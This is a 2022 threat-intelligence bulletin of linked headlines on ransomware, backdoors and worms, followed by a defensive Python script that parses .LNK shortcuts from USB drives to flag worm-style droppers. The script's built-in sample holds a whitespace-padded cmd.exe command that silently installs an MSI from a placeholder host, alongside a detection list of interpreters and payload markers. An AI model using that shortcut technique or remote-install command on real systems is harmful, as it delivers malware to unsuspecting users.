Threat Intelligence Bulletin - Server Backdoors, Worms, and State-sponsored Threats
Published 2022-07-06, updated 2023-01-27. https://gcsecurity.us/?p=92

Chinese cloud threat actor (tracked as 8220 Gang) updates its toolset to breach Linux servers and install cryptocurrency miners
- https://thehackernews.com/2022/06/microsoft-warns-of-cryptomining-malware.html

SessionManager, a malicious IIS module, is used as a backdoor on Exchange servers that were initially compromised through the ProxyLogon flaws
- https://thehackernews.com/2022/07/new-sessionmanager-backdoor-targeting.html
- https://www.darkreading.com/attacks-breaches/new-sessionmanager-exchange-server-backdoor-globally

Malicious NPM packages steal data from applications and web forms
- https://thehackernews.com/2022/07/researchers-uncover-malicious-npm.html

AstraLocker 2.0 infects devices directly from Word email attachments in a smash-and-grab campaign
- https://www.bleepingcomputer.com/news/security/astralocker-20-infects-users-directly-from-word-attachments/

Public proof-of-concept exploit released for CVE-2022-28219, an unauthenticated RCE vulnerability in Zoho ManageEngine ADAudit Plus that can lead to compromise of Active Directory accounts
- https://www.bleepingcomputer.com/news/security/zoho-manageengine-adaudit-plus-bug-gets-public-rce-exploit/

Microsoft details Raspberry Robin, a Windows worm that spreads via USB devices carrying a malicious .LNK file, found in hundreds of organizations across many industries
- https://www.bleepingcomputer.com/news/security/microsoft-finds-raspberry-robin-worm-in-hundreds-of-windows-networks/

Hive ransomware is rewritten from Go to Rust, making it more robust and harder to analyze
- https://thehackernews.com/2022/07/hive-ransomware-upgrades-to-rust-for.html

Threat actors abuse the legitimate adversary-simulation framework Brute Ratel C4 (BRc4) to evade detection
- https://thehackernews.com/2022/07/hackers-abusing-brc4-red-team.html

OpenSSL maintainers release 3.0.5 to fix a high-severity bug (CVE-2022-2274, https://nvd.nist.gov/vuln/detail/CVE-2022-2274): memory corruption in the RSA implementation on x86_64 CPUs with AVX512IFMA, introduced in 3.0.4, which could potentially lead to remote code execution
- https://thehackernews.com/2022/07/openssl-releases-patch-for-high.html

RedAlert ransomware campaign targets corporate Windows and Linux VMware ESXi servers
- https://www.bleepingcomputer.com/news/security/new-redalert-ransomware-targets-windows-linux-vmware-esxi-servers/

US government warns that North Korean state-sponsored threat actors are targeting healthcare organizations with Maui ransomware
- https://www.bleepingcomputer.com/news/security/us-govt-warns-of-maui-ransomware-attacks-against-healthcare-orgs/

Possible state-sponsored threat group attacks corporate email environments by targeting trusted systems that cannot run security software such as AV or endpoint protection
- https://securityintelligence.com/news/bulk-email-point-russian-espionage/
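The Raspberry Robin item above describes a worm that spreads via USB drives carrying a malicious .LNK file, which is a good prompt for a triage script an incident responder can run over shortcuts collected from removable media. The following is an added example, not code from the bulletin, from Microsoft or from the linked articles: it parses the Shell Link (MS-SHLLINK) header and StringData fields of a .LNK file and flags shortcuts whose target is a command interpreter, whose arguments fetch or install a remote payload, or whose arguments are padded with whitespace to hide the real command in the Properties dialog. The indicator lists are generic heuristics, not the worm's actual IOCs, and the two sample shortcuts (including the `example.invalid` URL) are constructed inline for the demo.

```python
"""Heuristic triage of Windows .LNK (Shell Link) files found on removable media.

Added example, not code from the bulletin or from Microsoft. Layout follows the
MS-SHLLINK specification: 76-byte header, optional LinkTargetIDList, optional
LinkInfo, then the StringData fields in a fixed order. Indicators are generic.
"""
import struct
from dataclasses import dataclass

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits (offset 20 in the header)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

STRING_FIELDS = (
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon_location"),
)

# Generic heuristics (assumptions for this example, not the worm's real IOCs).
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe"}
REMOTE_PAYLOAD_MARKERS = ("msiexec", "http://", "https://")


@dataclass
class LnkStrings:
    name: str = ""
    relative_path: str = ""
    working_dir: str = ""
    arguments: str = ""
    icon_location: str = ""


def parse_lnk(data: bytes) -> LnkStrings:
    """Validate the header, skip the variable-length blocks, return the StringData fields."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:        # IDListSize (2 bytes) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                  # LinkInfoSize includes its own 4 bytes
        off += struct.unpack_from("<I", data, off)[0]
    out = LnkStrings()
    for flag, field in STRING_FIELDS:          # CountCharacters (2 bytes) + chars, no terminator
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        if flags & IS_UNICODE:
            setattr(out, field, data[off:off + 2 * count].decode("utf-16-le"))
            off += 2 * count
        else:
            setattr(out, field, data[off:off + count].decode("cp1252", errors="replace"))
            off += count
    return out


def suspicious_reasons(link: LnkStrings) -> list[str]:
    """Return the list of heuristics the shortcut trips (empty list means nothing found)."""
    reasons = []
    target = link.relative_path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    args = link.arguments.lower()
    if target in INTERPRETERS:
        reasons.append(f"target is a command interpreter: {target}")
    if any(marker in args for marker in REMOTE_PAYLOAD_MARKERS):
        reasons.append("arguments fetch or install a remote payload")
    if "  " in link.arguments:  # whitespace runs push the real command out of the visible Target box
        reasons.append("arguments padded with whitespace")
    return reasons


def build_lnk(relative_path: str, arguments: str, id_list: bytes = b"") -> bytes:
    """Construct a minimal Unicode .LNK for the demo (sample input, not a real capture)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    body = b""
    if id_list:
        flags |= HAS_LINK_TARGET_ID_LIST
        body += struct.pack("<H", len(id_list)) + id_list
    for s in (relative_path, arguments):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    return header + bytes(HEADER_SIZE - len(header)) + body


# Constructed samples: a shortcut that launches cmd.exe to pull an MSI over HTTP, and a benign one.
SAMPLE_MALICIOUS = build_lnk(r"..\..\Windows\System32\cmd.exe",
                             "/R    msiexec /q /i http://example.invalid:8080/x", id_list=b"\x14\x00\x1f\x00")
SAMPLE_BENIGN = build_lnk(r"..\Documents\report.docx", "")

if __name__ == "__main__":
    for label, blob in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        link = parse_lnk(blob)
        print(label, "->", link.relative_path, "|", link.arguments, "|", suspicious_reasons(link))
```

Run it over every `*.lnk` on a mounted drive image by reading the files and passing the bytes to `parse_lnk`; anything that returns a non-empty reason list goes to the analyst, and the `relative_path`/`arguments` pair is what you pivot on in EDR telemetry.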